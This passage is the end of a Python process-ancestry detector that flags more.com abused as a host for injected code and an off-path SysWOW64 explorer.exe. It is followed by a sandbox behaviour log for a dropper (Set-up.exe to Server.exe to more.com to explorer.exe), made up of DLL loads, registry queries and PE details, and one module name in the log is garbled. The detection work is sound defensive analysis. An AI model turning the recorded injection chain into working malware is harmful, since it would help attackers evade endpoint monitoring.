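    # Benign control events (invented): an interactive shell paging output through more.com.
    ProcEvent(2000, 1, r"C:\Windows\explorer.exe"),
    ProcEvent(3000, 2000, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(3100, 3000, r"C:\Windows\System32\more.com"),
    ProcEvent(3110, 3100, r"C:\Windows\System32\conhost.exe"),
]

# Tunable assumptions for this example; adjust to the estate being monitored.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")
LOLBINS = {"more.com"}            # extend with other system binaries seen abused as hosts
CONSOLE_HOST = "conhost.exe"
EXPLORER_PATH = r"c:\windows\explorer.exe"


def _name(path: str) -> str:
    """Lower-cased image basename; ntpath handles Windows separators on any host OS."""
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Return image basenames from the outermost known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # `seen` guards against pid reuse loops
        seen.add(pid)
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def detect(events):
    """Apply the three parent/child rules and return one Hit per rule match."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = _name(e.image)
        chain = tuple(ancestry(events, e.pid))
        # 1. A binary running from a user-writable directory launches a system LOLBin.
        if parent and child in LOLBINS and any(m in parent.image.lower() for m in USER_WRITABLE):
            hits.append(Hit("temp_parent_spawns_lolbin", e.pid, chain))
        # 2. more.com is a pager: its only legitimate child is the console host.
        if parent and _name(parent.image) == "more.com" and child != CONSOLE_HOST:
            hits.append(Hit("more_com_spawns_non_console", e.pid, chain))
        # 3. The shell runs from C:\Windows\explorer.exe; a SysWOW64 copy started by
        #    another process is unusual enough to surface (assumption: tune per estate).
        if child == "explorer.exe" and e.image.lower() != EXPLORER_PATH:
            hits.append(Hit("explorer_off_path", e.pid, chain))
    return hits


if __name__ == "__main__":
    for h in detect(EVENTS):
        print(f"{h.rule:30} pid={h.pid}  chain={' -> '.join(h.chain)}")
```

Run against the constructed events, the benign cmd.exe -> more.com -> conhost.exe branch produces nothing, while the report's branch yields one hit for more.com under Server.exe and two for the SysWOW64 explorer.exe, each carrying the full chain back to Set-up.exe so the analyst can pivot straight to the dropper.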
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ?????? .dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ondemandconnroutehelper.dll (seven further load events of this module were recorded)
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: fswwa.dll
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_system.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvacore.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamediatypes.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvatransport.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamarshal.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dynamiclink.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: imagerenderer.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: prm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslfoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslmessaging.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mediafoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: videoframe.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mc_enc_dv.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: libmmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: svml_dispmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslunittesting.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: memory.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_system.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvacore.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamediatypes.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvatransport.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamarshal.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dynamiclink.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: imagerenderer.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: prm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslfoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslmessaging.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mediafoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: videoframe.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mc_enc_dv.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: libmmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: svml_dispmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslunittesting.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: memory.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: msftedit.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: cmlua.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\more.com | Section loaded: version.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptnet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_system.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvacore.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamediatypes.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvatransport.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dvamarshal.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dynamiclink.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: imagerenderer.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: prm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslfoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslmessaging.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mediafoundation.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: videoframe.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: mc_enc_dv.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: libmmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: svml_dispmd.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_date_time.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: boost_threads.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: aslunittesting.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: memory.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: fswwa.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: fswwa.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\more.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com | File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Set-up.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe | Static file information: File size 6513152 > 1048576
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File opened: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dll
Source: Set-up.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x602600
Source: Set-up.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Set-up.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamarshal\lib\win\release\32\dvamarshal.pdb source: Server.exe, 0000000C.00000002.2383590113.0000000000880000.00000002.00000001.01000000.0000000E.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450996101.0000000000C10000.00000002.00000001.01000000.0000000E.sdmp
